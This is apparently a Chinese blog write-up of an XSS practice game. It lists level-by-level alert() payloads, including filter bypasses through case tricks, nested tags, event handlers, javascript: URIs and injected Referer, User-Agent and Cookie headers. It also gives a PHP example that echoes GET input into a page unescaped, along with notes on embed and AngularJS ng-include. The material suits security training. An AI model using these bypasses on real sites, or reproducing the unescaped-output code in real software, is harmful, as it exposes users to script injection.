xss

url:http://test.ctf8.com/level1.php?name=test

小游戏payload:

  1. <script>alert("'test'")</script>
  2. "><script>alert("'test'")</script>
  3. ' onclick=alert("'test'") '
  4. " onclick=alert("'test'") "
  5. "><a href=javascript:alert("'test'")>test</a>
  6. "><scRipt>alert("'test'")</sCript>
  7. "><scriscriptpt>alert("'test'")</scriscriptpt>
  8. javascript:alert(1)
  9. javascript:alert(1)/* http://test*/
  10. ?keyword=123&t_link=123&t_history=123&t_sort=test" onclick=alert("'test'") type="text
  11. Referer: test" onclick=alert("'test'") type="text
  12. User-Agent:test" onclick=alert("'test'") type="text
  13. Cookie: user=test" onclick=alert("'test'") type="text
  14. 据说是一个图片中的exif信息,但是网址已失效;
  15. level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
  16. level16.php?keyword=<img%0asrc=x%0aonerror=alert("'test'")>
  17. level17.php?arg01=a&arg02= onmouseover=alert("'test'")
  18. level18.php?arg01= onmouseover=alert("'test'")&arg02=b
  19. flash xss
  20. flash xss

有些参数可能会隐藏哦:

源码:get.php

<?php

echo "<h2>php变量提交get参数:</h2>";

$str = $_GET["name"];

$str2 = $_GET["sex"];

echo "<h2>form表单提交get参数</h2>".'

<center>

<form id=form>

<p>姓名:</p><input name="name"  value="'.'" type="text">

<p>input通过php接收姓名参数:</p><input name="form"  value="'.$str.'" type="text">

<p>直接接收php性别参数</p><input name="form2"  value="'.$str2.'" type="text">

<input type="submit" value="提交"/>

</form>

</center>';

?>
  1. url中能看到的参数:?name=xiaoming&form=&form2=
  2. 没有在URL中显示参数:&sex=
  3. DOM不经过服务器的
  • 能显示在url中的参数中的是form表单中name属性定义的参数;php定义的需要手动添加,或者链接到form表单上;

在线编码网站:http://monyer.com/demo/monyerjs/

<embed>标签

embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

支持事件属性;

弹窗方式:

<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>

<embed src=son.html onmouseover=alert(1) width=100% heigth=100%>

AngularJS中的ng-include

  1. 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
  2. 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
  3. ng-controller="myCtrl"是不是正确,如果没有对应的controller
  4. 组件<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>

fath.html内容:

<head>

        <meta charset="utf-8">

        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>

</head>

<body>

    <div ng-include="'son.html'"></div>

    <!-- 路径里面必须带上单引号 -->

    <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错-->

</body>

son.html内容:

Hello world

数据一次完整的编码解码过程:

xss小游戏通关的更多相关文章

  1. XSS小游戏通关Writeup

    源码下载:https://files.cnblogs.com/files/nul1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 我也没啥可 ...

  2. XSS----payload,绕过,xss小游戏记录

    一.XSS 1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览 这些网页(或触发其他条件),从而执行其中的恶意代码. 1.xss实例代码: test.html <!DOCTYPE h ...

  3. xss小游戏源码分析

    配置 下载地址:https://files.cnblogs.com/files/Lmg66/xssgame-master.zip 使用:下载解压,放到www目录下(phpstudy),http服务下都 ...

  4. XSS小游戏

    第一关 直接在URL输入 ?name=<script>alert('xss')</script> 第二关 找源码,输入test,value值变为test,我们可以在输入框尝试x ...

  5. xss games20关小游戏附源代码

    1. get方式的的值直接输出来了. ?name=<script>alert(1)</script> 2. 同样没有过滤,不过需要闭合前边的双引号和>. "&g ...

  6. XSS挑战之旅---游戏通关攻略

    最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...

  7. Monyer.cn黑客小游戏

    花了一天的时间,Monyer给大家带来了一个有趣的东东——拥有15个关卡的黑客小游戏. 入口http://monyer.com/game/game1 因为一直以来都是大家跟我一起学习网络技术嘛,所以这 ...

  8. Javascript贪食蛇小游戏

    试玩:http://hovertree.com/game/9/ 贪吃蛇是一种风靡全球的小游戏,就是一条小蛇,不停地在屏幕上游走,吃各个方向出现的蛋,越吃越长.只要蛇头碰到屏幕四周,或者碰到自己的身子, ...

  9. 【python游戏编程之旅】第九篇---嗷大喵快跑小游戏开发实例

    本系列博客介绍以python+pygame库进行小游戏的开发.有写的不对之处还望各位海涵. 前几期博客我们一起学习了,pygame中的冲突检测技术以及一些常用的数据结构. 这次我们来一起做一个简单的酷 ...

随机推荐

  1. Linux下安装mysql时报错:FATAL ERROR: please install the following Perl modules before executing ./scripts/mysql_install_db:Data::Dumper

    如题,安装mysql过程中,执行scripts/mysql_install_db --user=mysql命令时报错: FATAL ERROR: please install the followin ...

  2. MySQL数据库根据一个或多个字段查询重复数据

    系统在开发测试过程中出现bug,比如并发操作没有处理好,数据库中往往会插入重复数据,这些脏数据经常会导致各种问题.bug可以修改,但是数据往往也要处理,处理SQL如下: 1.根据一个字段查找重复数据 ...

  3. Trapdoors for Hard Lattices and New Cryptographic Constructions

    郑重声明:原文参见标题,如有侵权,请联系作者,将会撤销发布! 以下是对本文关键部分的摘抄翻译,详情请参见原文. Abstract 我们展示了如何构造各种“trapdoor”密码工具,假设标准格问题的最 ...

  4. 问卷星的数据导入spss后变量乱码如何处理?

    一般是字符编码问题.打开一个空的SPSS数据集,选择[编辑]-[选项]-[常规]-[数据和语法的字符编码].修改下当前的编码系统,原来是第一种就换成第二种,原来是第二种就换成第一种,打开一个数据再看看 ...

  5. 曹工改bug:cpu狂飙,old gc频繁,线程神秘死亡连环案件调查报告

    曹工改bug:cpu狂飙,old gc频繁,线程神秘死亡连环案件调查报告 前言 前两天,访问开发环境上一个java服务,发现一直转圈圈,因为我开着fiddler,可以看到的现象是,接口一直没返回:本来 ...

  6. .NET - Task.Run vs Task.Factory.StartNew

    翻译自 Stephen Toub 2011年10月24日的博文<Task.Run vs Task.Factory.StartNew>,Stephen Toub 是微软并行计算平台团队的首席 ...

  7. googleEarth

    中国航天科技集团有限公司 http://www.spacechina.com/n25/n144/n210/index.html Celestia [官网]: https://celestia.spac ...

  8. unity 真机调试

    [Unity3D]Android和ios真机调试测Profiler http://blog.csdn.net/swj524152416/article/details/53466413 Unity5. ...

  9. docker run <image-id>和 docker start <container-id>

  10. Mybatis实例增删改查(二)

    创建实体类: package com.test.mybatis.bean; public class Employee { private Integer id; private String las ...